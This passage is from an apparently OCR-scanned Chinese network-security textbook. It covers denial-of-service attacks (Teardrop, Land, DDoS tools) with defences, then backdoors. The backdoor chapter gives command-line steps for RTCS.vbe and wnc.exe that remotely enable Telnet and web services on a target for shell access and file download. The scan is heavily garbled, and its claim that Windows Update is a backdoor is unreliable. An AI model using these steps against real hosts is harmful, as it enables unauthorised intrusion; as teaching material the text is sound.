攻击 者 故意 创建 一 个 长 度 大 于 65 535B(IP 协议 中 规定 最 大 的 IP 包 长 为 65 535B) 的 
ping 包 , 并 将 该 包 发 送 到 目标 受害 主机 ,由 于 目标 主机 的 服务 程序 无 法 处 理 过 大 的 包 , 而 引 
起 系统 崩溃 、 挂 起 或 重启 。 好 在 目前 所 有 的 操作 系统 开发 商都 对 此 进行 了 修补 或 升级 。 

2. Teardrop 攻击 

—^ IP 分 组 在 网 络 中 传播 的 时 候 , 由 于 沿途 各 个 链 路 的 最 大 传输 单元 不 同 ,路 由 器 常 
常会 对 IP 包 进 行 分 组 ,即将 一 个 包 分 成 一 些 片 段 ,使 每 段 都 足够 小 :以 便 通过 这 个 狭窄 的 链 
路 。 每 个 片段 将 具有 自己 完整 的 IP 包头: 其 大 部 分 内 容 和 最 初 的 包头 相同 ,一 个 很 典型 的 
不 同 在 于 包头 中 还 包含 偏 移 量 字 段 ,随后 各 片段 将 沿 各 自 的 路 径 独立 地 转发 到 目的 地 ,在 
目的 地 最 终 将 各 个 片段 进行 重组 。 这 就 是 所 谓 的 IP 包 的 分 段 重 组 技术 。Teardrop 攻击 就 
是 利用 IP 包 的 分 段 重 组 技术 在 系统 实现 中 的 一 个 错误 来 进行 了 。 
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Teardrop 利用 TCP 分 片 重组 时 的 一 个 漏洞 ,正常 时 分 片 是 首尾 相 接 的 ,Teardrop 使 用 
分 片 相互 交 义 (假设 数据 包 中 第 二 片 卫 包 的 偏 移 量 小 于 第 一 片 结束 的 位 移 , 而 且 算 上 第 二 片 
IP 包 的 Data, 也 未 超过 第 一 片 的 尾部 ,这 就 是 重 琶 现象 ) 的 漏洞 对 系统 主机 发 动 拒绝 服务 攻 
击 , 最 终 导 致 主机 宕 掉 ; 对 于 Windows 系统 会 导致 蓝屏 死机 ,并 显示 STOP 0x0000000A 错误 。 

检测 方法 : 对 接收 到 的 分 片 数据 包 进 行 分 析 , 计 算数 据 包 的 片 偏 移 量 (Offset) 是否 
有 误 。 

反攻 击 方法 : 添加 系统 补丁 程序 ,丢弃 收 到 的 病态 分 片 数 据 包 并 对 这 种 攻击 进行 审计 。 
尽 可 能 采用 最 新 的 操作 系统 ,或 者 在 防火 墙 上 设置 分 段 重 组 功能 ,由 防火 墙 先 接收 到 同一 原 
包 中 的 所 有 拆 分 数据 包 , 然 后 完成 重组 工作 ,而 不 是 直接 转发 。 因 为 防火 墙 上 可 以 设置 当 出 
现 重 倒 字 段 时 所 采用 的 规则 。 

3. Land 攻击 

Land 也 是 一 个 十 分 有 效 的 攻击 工具 , 它 对 当前 流行 的 大 部 分 操作 系统 及 一 部 分 路 由 器 
都 具有 相当 的 攻击 能 力 。 攻 击 者 利用 目标 受害 系统 的 自身 资源 实现 攻击 意图 。 由 于 目标 受 
害 系 统 具 有 漏洞 和 通信 协议 的 弱点 ,这 样 就 给 攻击 者 提供 了 攻击 的 机 会 。 

这 种 类 型 的 攻击 利用 TCP/IP 实现 中 的 处 理 程序 错误 进行 攻击 ,因此 最 有 效 最 直接 的 
防御 方法 是 尽早 发 现 潜在 的 错误 并 及 时 修改 这 些 错误 。 在 当前 的 软件 行业 里 , 太 多 的 程序 
存在 安全 问题 。 

从 长 远 角度 考虑 ,在 编制 软件 的 时 候 应 更 多 地 考虑 安全 问题 ,程序 员 应 使 用 安全 编程 技 
巧 ,全 面 分 析 预 测 程序 运行 时 可 能 出 现 的 情况 。 同 时 测试 也 不 能 只 局 限 在 功能 测试 ,应 更 多 
地 考虑 安全 问题 。 换 名 话说 ,应 该 在 软件 开发 的 各 个 环节 都 灌输 安全 意识 和 法 则 ,提高 代码 
质量 ,减少 安全 漏洞 。 

Land 攻击 是 一 种 使 用 相同 的 源 和 目的 主机 和 端口 发 送 数据 包 到 某 台 机 器 的 攻击 。 结 
果 通 常 使 存在 漏洞 的 机 器 崩溃 。 

在 Land 攻击 中 ,一 个 特别 打造 的 SYN 包 中 的 源 地 址 和 目标 地 址 都 被 设置 成 某 一 个 服 
务 器 地 址 ,这 时 将 导致 接收 服务 器 向 它 自 己 的 地 址 发 送 SYN-ACK 消息 ,结果 这 个 地 址 又 
发 回 ACK 消息 并 创建 一 个 空 连接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 掉 。 对 Land 攻击 
反应 不 同 , 许 多 UNIX 系统 将 崩溃 ,而 Windows NT 会 变 得 极其 缓慢 (大 约 持续 5min) 。 


7.4 分 布 式 拒绝 服务 攻击 


DDoS( Distributed Denial of Service ,分 布 式 拒绝 服务 ) 攻 击 ,其 攻击 者 利用 已 经 侵入 并 
控制 的 主机 ,对 某 一 单机 发 起 攻击 ,被 攻击 者 控制 着 的 计算 机 有 可 能 是 数 百 台 机 器 。 在 悬殊 
的 带宽 力量 对 比 下 ,被 攻击 的 主机 会 很 快 失去 反应 ,无 法 提供 服务 ,从 而 达到 攻击 的 目的 。 
实践 证 明 ,这 种 攻击 方式 是 非常 有 效 的 ,而 且 难 以 抵挡 。 


7.4.1 DDoS 的 特点 


分 布 式 拒绝 服务 攻击 的 特点 是 先 使 用 一 些 典型 的 黑客 人 侵 手段 控制 一 些 高 带宽 的 服务 
器 ,然后 在 这 些 服 务 器 上 安装 攻击 进程 , 集 数 十 台 、 数 百 台 甚至 上 千 台 机 器 的 力量 对 单一 攻 
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击 目标 实施 攻击 。 在 悬殊 的 带宽 力量 对 比 下 ,被 攻击 的 主机 会 很 快 因 不 胜 重负 而 瘫痪 。 分 
布 式 拒绝 服务 攻击 技术 发 展 十 分 迅速 ,由 于 其 隐蔽 性 和 分 布 性 很 难 被 识别 和 防御 ,DDoS 的 
结构 如 图 7-2 所 示 。 
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图 7-2 DDoS 的 结构 图 
7.4.2 攻击 手段 


攻击 者 在 客户 端 操纵 攻击 过 程 。 每 个 主 控 端 (Handle/Master) 是 一 台 已 被 攻击 者 入 侵 并 
运行 了 特定 程序 的 系统 主机 。 每 个 主 控 端 主机 能 够 控制 多 个 代理 端 (分 布 端 )(Agent)。 每 个 
代理 端 也 是 一 台 已 被 入 侵 并 运行 某 种 特定 程序 的 系统 主机 ,是 执行 攻击 的 角色 。 多 个 代理 端 
(分 布 端 ) 能 够 同时 响应 攻击 命令 并 向 被 攻击 目标 主机 发 送 拒 绝 服 务 攻击 数据 包 。 攻 击 过 程 实 
施 的 顺序 为 : 攻击 者 一 主 控 端 玉 分 布 端 习 目 标 主机 。 发 动 DDoS 攻击 分 为 以 下 两 个 阶段 。 

1. 初始 的 大 规模 入 侵 阶段 

该 阶段 ,攻击 者 使 用 自动 工具 扫描 远程 脆弱 主机 ,并 采用 典型 的 黑客 人 侵 手 段 得 到 这 些 
主机 的 控制 权 ,安装 DDoS 代理 端 (分 布 端 ) 。 这 些 主机 也 是 DDoS 的 受害 者 。 目 前 还 没有 
DDoS 工具 能 够 自发 完成 对 代理 端的 入 侵 。 

2. 大 规模 DDoS 攻击 阶段 


即 通过 主 控 端 和 代理 端 (分 布 端 ) 对 目标 受害 主机 发 起 大 规模 拒绝 服务 攻击 。 
7.4.3 攻击 工具 


DDoS 比较 著名 的 攻击 工具 包括 : trin00, TFN( Tribe Flood Network) ,Stacheldraht 
和 TFN2K( Tribe Flood Network 2000) , 

1. trin00 

1999 年 6 月 trin00 工具 出 现 , 同 年 8 月 17 日 攻击 了 美国 明尼苏达 大 学 ,当时 该 工具 集 
成 了 至 少 227 个 主机 的 控制 权 。 攻 击 包 从 这 些 主机 源源 不 断 地 送 到 明尼苏达 大 学 的 服务 
器 ,造成 其 网 络 严重 瘫 疯 。trin00 由 三 部 分 组 成 : 客户 端 ( 攻 击 者 ), 主 控 端 及 分 布 端 (代理 
端 ) 。 代 理 端 向 目标 受害 主机 发 送 的 DDoS 都 是 UDP 报 文 ,这 些 报 文 都 从 一 个 端口 发 出 ,但 
随机 地 袭击 目标 主机 上 的 不 同 端 口 。 目标 主机 对 每 一 个 报 文 回复 一 个 ICMP Port 
Unreachable 的 信息 ,大 量 不 同 主机 同时 发 来 的 这 些 洪水 般 的 报 文 使 得 目标 主机 很 快 瘫痪 。 
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2. TEN 


1999 年 8 H TEN 工具 出 现 。 最 初 , 该 工具 基于 UNIX 系统 ,集成 了 ICMP flooding. 
SYN flooding. UDP flooding 和 Smurf 等 多 种 攻击 方式 ,还 提供 了 与 TCP 端口 绑 定 的 命令 
行 root shell。 同 时 ,TFN 还 在 发 起 攻击 的 平台 上 创建 后 门 ,允许 攻击 者 以 root 身份 访问 这 
台 被 利用 的 机 器 。TEFN(Tribal Flood Network) 由 主 控 端 程序 和 代理 端 程序 两 部 分 组 成 ， 
它 主要 采取 的 攻击 方法 为 : SYN 风暴 、Ping K UDP 炸弹 和 SMURF, 具 有 伪造 数据 包 的 
能 力 。TFN 是 一 种 典型 的 拒绝 服务 程序 , 它 的 目的 是 阻塞 网 络 及 主机 的 正常 通信 ,达到 次 
疯 目 标 网 络 的 目的 。 

3. Stacheldraht 


1999 年 9 月 Stacheldraht 工具 出 现 。 该 工具 是 在 TEN 的 基础 上 开发 出 来 的 ,并 结合 
T trin00 的 特点 。 即 它 和 trin00 一 样 具有 主 控 端 (代理 端 ) 的 特点 ,又 和 TEN 一 样 集成 了 
ICMP flooding, SYN flooding, UDP flooding 和 Smurf 等 多 种 攻击 方式 。 同 时 ， 
Stacheldraht 还 克服 了 TFN 明文 通信 的 弱点 ,在 攻击 者 与 主 控 端 之 间 采 用 加 密 验 证 通信 机 
制 ( 对 称 密 钥 加 密 体制 ), 并 具有 自动 升级 的 功能 。 

4. TFN2K 

1999 年 12 H TFN2K 工具 出 现 , 它 是 TEN 的 升级 版 ,能 从 多 个 源 对 单个 或 多 个 目标 
发 动 攻击 ,该 工具 具有 如 下 特点 。 

主 控 端 和 代理 端 之 间 进 行 加 密 传输 ,其 间 还 混杂 一 些 发 往 任意 地 址 的 无 关 的 包 从 而 达 
到 迷惑 的 目的 ,增加 了 分 析 和 监视 的 难度 。 

主 控 端 和 代理 端 之 间 的 通信 可 以 随机 地 选择 不 同 协议 来 完成 (TCP,UDP,ICMP), 代 
理 端 也 可 以 随机 选择 不 同 的 攻击 手段 (TCP/SYN, UDP, ICMP/PING, BROADCAST 
PING/SMUREF 等 ) 来 攻击 目标 受害 主机 。 特 别 是 TFN2K 还 尝试 发 送 一 些 非法 报 文 或 无 
效 报 文 ,从 而 导致 目标 主机 十 分 不 稳定 甚至 崩溃 。 

所 有 从 主 控 端 或 代理 端 发 送出 的 包 都 使 用 IP 地 址 欺骗 来 隐藏 源 地 址 。 

与 TFN 不 同 ,TFN2K 的 代理 端 是 完全 沉默 的 , 它 不 响应 来 自主 控 端的 命令 。 主 控 端 
会 将 每 个 命令 重复 发 送 20 次 ,一 般 情况 下 代理 端 可 以 至 少 一 次 收 到 该 命令 。 

5j TEN 和 Stacheldraht 不 同 ,TFN2K 的 命令 不 是 基于 字符 串 的 。 其 命令 的 形式 为 
“十 <id> 十 <<data>>”, 其 中 ,<id> 为 一 个 字 节 ,表示 某 一 特定 命令 ,<data 之 代表 该 命令 
的 参数 。 所 有 的 命令 都 使 用 基于 密 钥 的 CAST-256 算法 加 密 (RFC2612) ,该 密 钥 在 编译 时 
确定 并 作为 运行 该 主 控 端的 密码 。 


7.4.4 DDoS 的 检测 

现在 网 上 采用 DDoS 方式 进行 攻击 的 攻击 者 日 益 增 多 ,只 有 及 早 发 现 自己 受到 攻击 才 
能 避免 遭受 惨重 的 损失 ,检测 DDoS 攻击 的 主要 方法 有 以 下 几 种 。 

1. 根据 异常 情况 分 析 

当 网 络 的 通信 量 突然 急剧 增长 ,超过 平常 的 极限 值 时 ,一 定 要 提高 警惕 ,检测 此 时 的 通 
信 。 当 网 站 的 某 一 特定 服务 总 是 失败 时 ,也 要 多 加 注意 。 当 发 现 有 特大 型 的 ICP 和 UDP 
数据 包 通 过 或 数据 包 内 容 可 疑 时 都 要 留神 。 总 之 , 当 机 器 出 现 异 常情 况 时 ,最 好 分 析 这 些 情 
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况 , 防 患 于 未 然 。 

2. 使 用 DDoS 检测 工具 

当 攻 击 者 想 使 其 攻击 阴谋 得 促 时 ,他 首先 要 扫描 系统 漏洞 。 目 前 市 面 上 的 一 些 网 络 人 
侵 检 测 系统 ,可 以 杜绝 攻击 者 的 扫描 行为 。 另 外 ,一 些 扫 描 器 工具 可 以 发 现 攻击 者 植 人 系统 
的 代理 程序 ,并 可 以 把 它 从 系统 中 删除 。 


7.4.5 DDoS 攻击 的 防御 策略 


由 于 DDoS 攻击 具有 隐蔽 性 ,因此 到 目前 为 止 还 没有 发 现 对 DDoS 攻击 行 之 有 效 的 解 
决 方法 。 所 以 要 加 强 安 全 防范 意识 ,提高 网 络 系统 的 安全 性 。 可 采取 的 安全 防御 措施 有 以 
下 几 种 。 

(1) 及 早 发 现 系统 存在 的 攻击 漏洞 ,及 时 安装 系统 补丁 程序 。 对 一 些 重要 的 信息 (例如 
系统 配置 信息 ) 建 立 和 完善 备份 机 制 。 对 一 些 特权 账号 (例如 管理 员 账 号 ) 的 密码 设置 要 说 
慎 。 通 过 这 样 一 系列 的 举措 可 以 把 攻击 者 的 可 乘 之 机 降低 到 最 小 。 

(2) 在 网 络 管理 方面 ,要 经 常 检 查 系统 的 物理 环境 ,禁止 那些 不 必要 的 网 络 服务 。 建 立 边界 
安全 界限 ,确保 输出 的 包 受 到 正确 限制 。 经 常 检测 系统 配置 信息 ,并 注意 查看 每 天 的 安全 日 志 。 

(3) 利用 网 络 安全 设备 (例如 : 防火 墙 ) 来 加 固 网 络 的 安全 性 ,配置 好 它们 的 安全 规则 ， 
过 滤 掉 所 有 可 能 的 伪造 数据 包 。 

(4) 比较 好 的 防御 措施 就 是 和 网 络 服务 提供 商 协调 工作 ,让 他 们 帮助 实现 路 由 的 访问 
控制 和 对 带宽 总 量 的 限制 。 

(5) 当 发 现 自己 正在 遭受 DDoS 攻击 时 ,应 当 启动 应 付 策略 , 尽 可 能 快 地 追踪 攻击 包 ， 
并 且 要 及 时 联系 ISP 和 有 关 应 急 组 织 ,分析 受 影响 的 系统 ,确定 涉及 的 其 他 结 点 ,从 而 阻挡 
从 已 知 攻击 结 点 的 流量 。 

(6) 当 你 是 潜在 的 DDoS 攻击 受害 者 ,发现 计算 机 被 攻击 者 用 作 主 控 端 和 代理 端 时 ,不 
能 因为 系统 暂时 没有 受到 损害 而 掉以轻心 ,攻击 者 已 发 现 系统 的 漏洞 ,这 对 系统 是 一 个 很 大 
的 威胁 。 所 以 一 旦 发 现 系 统 中 存在 DDoS 攻击 的 工具 软件 要 及 时 把 它 清除 ,以免 留 下 后 患 。 


习 题 
一 、 填 空 题 
1. DoS 攻击 的 目的 是 。 常 见 的 DoS 攻击 是 和 
2. SYN 风暴 属于 攻击 。 
3. SYN flooding 攻击 即 是 利用 设计 的 弱点 。 
4. Smurf 攻击 结合 使 用 了 和 o 
5. Smurf 攻击 行为 的 完成 涉及 三 个 元 素 3 和 
6. DDoS 攻击 的 顺序 为 、 ` 和 
二 、 简 答题 


1. 如 何 防 范 SYN 风暴 ? 
2. DDoS 攻击 的 防御 策略 是 什么 ? 
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学 习 目 标 : 
a 掌握 网 络 后 门 工 具 及 木马 的 使 用 。 
m 掌握 网 络 隐身 的 方法 。 


后 门 程序 一 般 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程序 方法 。 在 软 
件 的 开发 阶段 ,程序 员 常常 会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设计 中 的 缺陷 。 但 
是 ,如 果 这 些 后 门 被 其 他 人 知道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 程序 ,那么 它 就 成 了 安 
全 风险 ,容易 被 黑客 当成 漏洞 进行 攻击 。 

只 要 能 不 通过 正常 登录 进入 系统 的 途径 都 称 为 网 络 后 门 。 后 门 的 好 坏 取 决 于 被 管理 员 
发 现 的 概率 。 只 要 是 不 容易 被 发 现 的 后 门 都 是 好 后 门 。 留 后 门 的 原理 和 选 间 谍 是 一 样 的 ， 
让 管理 员 看 了 感觉 没有 任何 特别 的 。 


8.1 后 门 基础 


8.1.1 后 门 的 定义 


后 门 程序 又 称 特 洛 依 木马 ,其 用 途 在 于 潜伏 在 计算 机 中 ,从 事 搜集 信息 或 便于 黑客 进入 
的 动作 。 后 门 程序 和 计算 机 病毒 最 大 的 差别 在 于 后 门 程序 不 一 定 有 自我 复制 的 动作 ,也 就 
是 后 门 程序 不 一 定 会 “感染 ”其 他 计算 机 。 

后 门 是 一 种 登录 系统 的 方法 , 它 不 仅 能 绕 过 系统 已 有 的 安全 设置 ,还 能 挫败 系统 上 各 种 
增强 的 安全 设置 。 

后 门 从 简单 到 复杂 ,有 很 多 的 类 型 。 简 单 的 后 门 可 能 只 是 建立 一 个 新 的 账号 ,或 者 接管 
一 个 很 少 使 用 的 账号 ,复杂 的 后 门 (包括 木马 ) 可 能 会 绕 过 系统 的 安全 认证 而 对 系统 有 安全 
存 取 权 。 例 如 一 个 login 程序 , 当 输 入 特定 的 密码 时 ,就 能 以 管理 员 的 权限 来 存 取 系统 。 

后 门 能 相互 关联 ,而 且 这 个 技术 被 许多 黑客 所 使 用 。 例 如 ,黑客 可 能 使 用 密码 破解 一 个 
或 多 个 账号 密码 ,黑客 可 能 会 建立 一 个 或 多 个 账号 。 一 个 黑客 可 以 存 取 这 个 系统 ,黑客 可 能 
使 用 一 些 技术 或 利用 系统 的 某 个 漏洞 来 提升 权限 。 黑 客 可 能 会 对 系统 的 配置 文件 进行 小 部 
分 的 修改 ,以 降低 系统 的 防卫 性 能 。 也 可 能 会 安装 一 个 木马 程序 ,使 系统 打开 一 个 安全 漏 
洞 ,以 利于 黑客 完全 掌握 系统 。 

以 上 是 对 “后 门 ” 的 解释 ,其 实 可 以 用 很 简单 的 一 句 话 来 概括 它 : 后 门 就 是 留 在 计算 机 
系统 中 , 供 某 人 特殊 使 用 并 通过 某 种 特殊 方式 控制 计算 机 系统 的 途径 。 很 显然 ,知己 知 彼 才 
能 百 战 不 殖 , 掌 握 好 后 门 技术 是 每 个 网 络 管理 者 必 备 的 基本 技能 。 

后 门 程序 , 跟 人 们 通常 所 说 的 “木马 ”有 联系 也 有 区 别 。 

联系 在 于 : 都 是 隐藏 在 用 户 系统 中 向 外 发 送信 息 ,而 且 本 身 具 有 一 定 权 限 , 以 便 远程 机 
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器 对 本 机 的 控制 。 
KIEF: 木马 是 一 个 完整 的 软件 ,而 后 门 则 体积 较 小 且 功 能 都 很 单一 ,而 且 在 病毒 命 
名 中 ,后 门 一 般 带 有 backdoor 字样 ,而 木马 一 般 则 带 有 Trojan 字样 。 


8.1.2 分 类 


后 门 可 以 按照 很 多 方式 来 分 类 ,标准 不 同 分 类 自然 就 不 同 ,为 了 便于 理解 ,这 里 从 技术 
方面 来 考虑 后 门 程序 的 分 类 方法 : 

1. 网 页 后 门 

此 类 后 门 程序 一 般 都 是 用 服务 器 上 正常 的 Web 服务 来 构造 自己 的 连接 方式 ,比如 非常 
流行 的 ASP cgi 脚本 后 门 等 ,代表 性 的 软件 是 海 阳 顶端 。 海 阳 顶 端 功 能 是 非常 强大 的 ,而 
且 不 容易 被 查 杀 。 

2. 线程 插入 后 门 

利用 系统 自身 的 某 个 服务 或 者 线程 ,将 后 门 程序 插入 到 其 中 ,这 种 后 门 在 运行 时 没有 进 
程 ,所 有 网 络 操 作 均 插入 到 其 他 应 用 程序 的 进程 中 完成 。 也 就 是 说 ,即使 受 控 制 端 安装 的 防 
火 墙 拥 有 “应 用 程序 访问 权限 ”的 功能 ,也 不 能 对 这 样 的 后 门 进行 有 效 的 警告 和 拦截 ,也 就 使 
对 方 的 防火 墙 形同虚设 了 ,因为 对 它 的 查 杀 比较 困难 。 这 种 后 门 本 身 的 功能 比较 强大 ,代表 
性 的 软件 是 小 榕 的 BITS, 使 用 范围 : Windows 2000/XP/2003。 

3. 扩展 后 门 

所 谓 的 “扩展 ”, 是 指 在 功能 上 有 大 的 提升 , 比 普通 的 单一 功能 的 后 门 有 更 强 的 使 用 性 。 
在 普通 意义 上 理解 ,可 以 看 成 是 将 非常 多 的 功能 集成 到 了 后 门 里 ,让 后 门 本 身 就 可 以 实现 很 
多 功能 ,方便 直接 控制 肉鸡 或 者 服务 器 。 这 类 后 门 非常 受 初学 者 的 喜爱 ,通常 集成 了 文件 上 
传 /下 载 、 系 统 用 户 检测 .HTTP 访问 \ 终 端 安 装 、 端 口 开 放 、 启 动 /停止 服务 等 功能 ,本 身 就 
是 个 小 的 工具 包 , 功 能 强大 ,能 实现 非常 多 的 常见 安全 功能 ,适合 新 手 使 用 。 代 表 性 的 软件 
是 Wineggdrop shell, 使 用 范围 : Windows 2000/XP/2003, 

4. C/S RT] 

和 传统 的 木马 程序 类 似 的 控制 方法 ,采用 “客户 /服务 端 " 的 控制 方式 ,通过 某 种 特定 的 
访问 方式 来 启动 后 门 进而 控制 服务 器 。 比 如 较 巧 妙 的 就 是 ICMP Door 了 ,这 个 后 门 利用 
ICMP 通道 进行 通信 ,所 以 不 开 任何 端口 ,只 是 利用 系统 本 身 的 ICMP 包 进 行 控制 安装 成 系 
统 服务 后 ,开机 自动 运行 ,可 以 穿 透 很 多 防火 墙 。 很 明显 可 以 看 出 它 的 最 大 特点 : 不 开 任 何 
端口 ,只 通过 ICMP 控制 。 和 上 面 任何 一 款 后 门 程序 相 比 . 它 的 控制 方式 是 很 特殊 的 , 连 80 
端口 都 不 用 开放 ,使 用 范围 : Windows 2000/XP/2003 。 

最 著名 的 后 门 程序 是 微软 的 Windows Update, Windows Update 的 动作 包括 以 下 三 
^r: 开机 时 自动 连 上 微软 的 网 站 ,将 计算 机 的 现 况 报 告 给 网 站 以 进行 处 理 , 网 站 通过 
Windows Update 程序 通知 使 用 者 是 否 有 必须 更 新 的 文件 ,以 及 如 何 更 新 。 如 果 针 对 这 些 
动作 进行 分 析 , 则 “开机 时 自动 连 上 微软 网 站 ”的 动作 就 是 后 门 程序 特性 中 的 “潜伏 ”, 而 “将 
计算 机 现 况 报告 ”的 动作 是 “搜集 信息 ”。 因 此 ,虽然 微软 说 它 不 会 搜集 个 人 计算 机 中 的 信 
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息 ,但 如 果 从 Windows Update 来 进行 分 析 的 话 , 就 会 发 现 它 必须 搜集 个 人 计算 机 的 信息 才 
能 进行 操作 ,所 差 者 只 是 搜集 了 哪些 信息 而 已 。 


8.2 后 门 工具 的 使 用 


8.2.1 使 用 工具 RTCS. vbe 开启 对 方 的 Telnet 服务 


利用 主机 上 的 Telnet 服务 ,有 管理 员 密 码 就 可 以 登录 到 对 方 的 命令 行 , 进 而 操作 对 方 
的 文件 系统 。 如 果 Telnet 服务 是 关闭 的 ,就 不 能 登录 了 。 

利用 工具 RTCS. vbe 可 以 远程 开启 对 方 的 Telnet 服务 ,使 用 该 工具 需要 知道 对 方 具有 
管理 员 权限 的 用 户 名 和 密码 。 

命令 是 “cscript RTCS. vbe 192. 168. 1. 5 administrator 123456 1 23”。 其 中 : 

COD cscript 是 操作 系统 自 带 的 命令 ; 

(2) RTCS. vbe 是 该 工具 软件 脚本 文件 ; 

(3) IP 地 址 是 要 启动 Telnet 的 主机 地 址 ; 

(4) administrator 是 用 户 名 ; 

(5) 123456 是 密码 ; 

(6) 1 为 NTLM 身份 验证 ; 

(7) 23 是 Telnet 开放 的 端口 。 

该 命令 根据 网 络 的 速度 ,执行 的 时 候 需要 一 段 时 间 , 可 以 开启 远程 Telnet 服务 ,如 图 8-1 
所 示 。 执 行 完成 后 ,对 方 的 Telnet 服务 就 被 开启 了 。 在 DOS 提示 符 下 ,可 以 登录 目标 主机 
的 Telnet 服务 ,首先 输入 命令 “Telnet 192. 168. 1. 2”, 因 为 Telnet 的 用 户 名 和 密码 是 明文 
传递 的 ,首先 出 现 确认 发 送信 息 对 话 框 , 如 图 8-2 所 示 。 登 录 Telnet 的 用 户 名 和 密码 ,输入 
字符 “y”, 进 入 Telnet 的 登录 界面 ,需要 输入 主机 的 用 户 名 和 密码 ,如 图 8-3 所 示 。 登 录 
Telnet 服务 器 ,如 果 用 户 名 和 密码 没有 错误 ,将 进入 对 方 主 机 的 命令 行 ,如 图 8-4 Bros. 
体 使 用 步骤 见 实验 31。 


eS or oe RTCS.ube 192 168.1 Ecce 123456 ! 23 
icrosoft (R) Windows Script Host 5.6 
权 所 有 (5c) Microsoft Corporation [res 2001; 保留 所 有 权利 。 | 


ITCS vl. 
lemote Telnet Configure Seript, | by zzzevazzz 
lcome to visite www.isgreu.c. 


age: 
script C: RTCSWRTCS.ube targetIP username password NTLMauthor telnetport 
[It will auto change state of target telnet server. 
OOOOOOOO OO OOD(O0000000000000000000000900006000000000000000000000000000000 
onneting 172.18.25.109.... 

t 
[Setting NTLM=1.... 
[Setting port=23.... 

t 


rying state of telnet server... 
hangeing state... 


[Target telnet server has been START Successfully! 
Now, uou can try: telnet 172.18.25.109 23, to get a shell. 


|c:NRTCS» 


图 8-1 远程 开启 对 方 的 Telnet 服务 


第 8 章 网 络 后 门 与 隐身 157 


CAWINNT\ System32\cmd.exe - telnet 172.18.25.109 Bixj 


icrosoft (R) Windows 2000 (TM) 版 本 5.00 (内 部 版 本 号 2195) E 2| 
欢迎 使 用 Microsoft Telnet Client 
elnet Client 内 部 版 本 号 5.00.99203.1 


scape 字符 为 “CTRL+]】 


您 将 要 发 送 密码 信息 到 Internet 区 域 中 的 远程 计算 机 。 这 可 能 不 安全 。 是 否 还 要 发 送 (y/n): y 


图 8-2 确认 对 话 框 


图 8-4 登录 成 功 


友 难 点 说 明 : 

NTLM 身份 验证 选项 有 以 下 三 个 值 ,默认 是 2。 

0: 不 使 用 NTLM 身份 验证 。 

1: 先 尝试 NTLM 身份 验证 ,如 果 失 败 , 再 使 用 用 户 名 和 密码 。 

2: 只 使 用 NTLM 身份 验证 。 

从 工作 流程 可 以 看 出 ,NTLM 是 以 当前 用 户 的 身份 向 Telnet 服务 器 发 送 登 录 请 求 的 ， 


而 不 是 用 自己 的 账户 和 密码 登录 ,如 果 用 默认 值 2 登录 ,显然 登录 将 会 失败 。 


举 个 例子 来 说 ,你 家 的 机 器 名 为 A( 本 地 机 器 ), 你 登录 的 机 器 名 为 B( 远 地 机 器 ) ,你 在 


A 上 的 账户 是 ABC ,密码 是 1234, 在 B 上 的 账号 是 XYZ, 密 码 是 5678。 当 你 想 Telnet 到 B 
时 ,NTLM 将 自动 以 当前 用 户 的 账号 和 密码 作为 登录 的 凭据 来 进行 登录 , 即 用 ABC 和 
1234, 而 并 非 用 你 要 用 的 登录 账号 XYZ 和 5678, 且 这 些 都 是 自动 完成 的 ,因此 登录 操作 将 
失败 ,因此 需要 将 NTLM 的 值 设置 为 0 或 者 1。 


8.2.2 使 用 工具 wnc 开启 对 方 的 Telnet 服务 


使 用 工具 软件 wnc. exe 可 以 在 对 方 的 主机 上 开启 Telnet 服务 。 其 中 ,Telnet 服务 的 端 
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口 是 707。 具 体 使 用 步骤 见 实 验 32. 
在 对 方 的 操作 系统 下 执行 wnc. exe, 可 开启 Telnet 服务 ,端口 为 707, 如 图 8-5 所 示 。 


图 8-5 建立 Telnet 服务 


可 以 利用 “telnet 172. 18. 25. 109 707” 命 令 登 录 到 对 方 的 命令 行 ,执行 的 方法 如 图 8-6 
所 示 。 登 录 到 对 方 的 命令 行 ,不 用 任何 的 用 户 名 和 密码 就 可 以 登录 对 方 主机 的 命令 行 ,如 
图 8-7 所 示 。 


icrosoft Windows 2000 [Uersion 5.00.2195] 
(C) 版 权 所 有 1985-2000 Microsoft Corp. 


:\>telnet 192.168.1.5 707 


Mic .00.2195] 
(C) 版 权 所 有 1985-1998 Microsoft Corp. 


C: Ninc»ipconfig 
Windows 2000 IP Configuration 
Ethernet adapter 本 地 连接 : 
Connection-specific DNS Suffix . : 
IP Address. . .......... : 192.168.1.5 
Subnet Mask . . ......... : 255.255.255.0 
C: Nanc? 


4 ————————náá:. 


图 8-7 验证 登录 成 功 


8.2.3 使 用 工具 wie 建立 远程 主机 的 Web 服务 


使 用 工具 软件 wnc. exe 可 以 在 对 方 的 主机 上 开启 Web 服务 ,其 中 Web 服务 的 端口 是 
808。 具 体 使 用 步骤 见 实验 32。 

步骤 1 在 对 方 的 操作 系统 下 执行 一 次 wnc. exe, 可 开启 Web 服务 ,端口 为 808 ,如 图 8-8 
所 示 。 

步骤 2 执行 完毕 后 ,利用 命令 ”netstat-an” 来 查看 开启 的 808 和 707 端口 ,如 图 8-9 
所 示 。 

LISTENING 正在 监听 : 显示 listening 项 的 端口 ,意思 是 别 的 计算 机 可 以 连接 该 端口 ， 
本 地 计算 机 会 主动 接受 并 执行 一 些 服务 ,并 返回 结果 给 连接 的 客户 端 。 
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图 8-8 建立 Web 服务 


State 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 


LISTENING 
LISTENING 
LISTENING 
LISTENING 


8-9 端口 开启 


TIME_WAIT 等 待 连接 。 

ESTABLISHED 正在 连接 中 ,表示 两 台 机 器 正在 通信 。 

SYN_RECEIVED 正在 处 于 连接 的 初始 同步 状态 , 当 有 多 个 SYN_RECEIVED 状态 
时 ,可 能 中 了 SYN flood 攻击 。 

CLOSE WAIT 对 方 已 经 关闭 ,对方 主动 关闭 连接 或 者 网 络 异 常 导致 连接 中 断 ,这 时 我 
方 的 状态 会 变 成 CLOSE_WAIT, 此 时 要 调用 close() 来 使 得 连接 正确 关闭 。 

步骤 3 测试 Web 服务 808 端口 ,在 浏览 器 地 址 栏 中 输入 “http://192. 168. 1. 5:808”, 
出 现 主 机 的 盘 符 列表 ,如 图 8-10 所 示 。 可 以 下 载 对 方 硬盘 和 光盘 上 的 任意 文件 (对 于 汉字 
